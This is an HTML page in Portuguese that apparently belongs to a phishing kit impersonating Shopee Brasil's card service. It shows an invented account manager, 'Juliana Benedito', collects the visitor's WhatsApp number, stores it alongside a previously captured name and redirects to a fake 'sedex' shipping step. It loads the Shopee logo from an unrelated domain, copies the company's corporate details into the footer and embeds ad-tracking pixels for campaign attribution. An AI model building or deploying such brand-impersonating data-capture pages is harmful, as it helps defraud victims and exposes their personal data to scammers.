﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Sua Gerente</title>






    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->




    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1F2937;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .welcome-title {
            font-size: 1.5rem;
            font-weight: 600;
            color: #1F2937;
            margin-bottom: 0.5rem;
            text-align: center;
        }

        .welcome-title span {
            color: #EE4D2D;
        }

        .subtitle {
            color: #6B7280;
            margin-bottom: 2rem;
            text-align: center;
            font-size: 1rem;
        }

        .manager-card {
            background: #FFF5F3;
            border: 1px solid rgba(238, 77, 45, 0.1);
            border-radius: 12px;
            padding: 2rem;
            margin-bottom: 2rem;
            text-align: center;
        }

        .manager-photo {
            width: 120px;
            height: 120px;
            border-radius: 60px;
            margin-bottom: 1rem;
            border: 3px solid #EE4D2D;
            padding: 3px;
        }

        .manager-role {
            color: #6B7280;
            font-size: 0.875rem;
            margin-bottom: 0.5rem;
        }

        .manager-name {
            color: #EE4D2D;
            font-size: 1.25rem;
            font-weight: 600;
            margin-bottom: 0.5rem;
        }

        .manager-award {
            background: white;
            color: #4B5563;
            padding: 0.5rem 1rem;
            border-radius: 50px;
            font-size: 0.875rem;
            display: inline-block;
            margin-top: 0.5rem;
        }

        .contact-info {
            text-align: center;
            color: #4B5563;
            margin: 1.5rem 0;
            font-size: 0.9375rem;
            line-height: 1.6;
        }

        .form-label {
            color: #6B7280;
            font-size: 0.875rem;
            margin-bottom: 0.5rem;
            display: block;
        }

        .form-control {
            width: 100%;
            padding: 0.875rem 1.25rem;
            border: 1px solid #E5E7EB;
            border-radius: 50px;
            font-size: 1rem;
            color: #1F2937;
            transition: all 0.2s ease;
        }

        .form-control:focus {
            border-color: #EE4D2D;
            outline: none;
            box-shadow: 0 0 0 2px rgba(238, 77, 45, 0.1);
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 50px;
            font-size: 1rem;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1.5rem;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }

            .manager-card {
                padding: 1.5rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <div id="introducao-gerente">
                <h2 class="welcome-title">Ótimo, quase lá <span id="nomeUsuario"></span>!</h2>
                <p class="subtitle">Antes de escolher uma forma de envio, conheça sua Gerente Responsável:</p>
                
                <div class="manager-card">
                    <img src="gerente.jpeg" class="manager-photo" alt="Foto da Gerente">
                    <p class="manager-role">Gerente</p>
                    <h4 class="manager-name">Juliana Benedito</h4>
                    <span class="manager-award">🏆 Melhor gerente 2023-2024</span>
                </div>
     
                <p class="contact-info">Após concluir o procedimento, Juliana entrará em contato para garantir um atendimento humanizado sempre que você precisar.</p>
    
                <div class="form-group">
                    <label for="whatsapp" class="form-label">Digite seu WhatsApp</label>
                    <input type="text" class="form-control" id="whatsapp" placeholder="(00) 00000-0000">
                </div>
    
                <button type="submit" class="btn-custom" onclick="enviarWhatsApp()">
                    Continuar
                </button>
            </div>
        </div>
    </div>    

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    function carregarNomeUsuario() {
        const nomeCompleto = localStorage.getItem('nome');
        const primeiroNome = nomeCompleto ? nomeCompleto.split(' ')[0] : '';
        document.getElementById('nomeUsuario').innerText = primeiroNome;
    }

    carregarNomeUsuario();

    function enviarWhatsApp() {
        const whatsapp = document.getElementById('whatsapp').value;
        if (whatsapp) {
            localStorage.setItem('whatsapp', whatsapp);
            window.location.href = 'sedex/index.php.html';
        } else {
            alert('Por favor, insira seu número de WhatsApp.');
        }
    }
</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
    window.pixelId = "678838a121a1854bae5e0469";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
</script>
</body>
</html>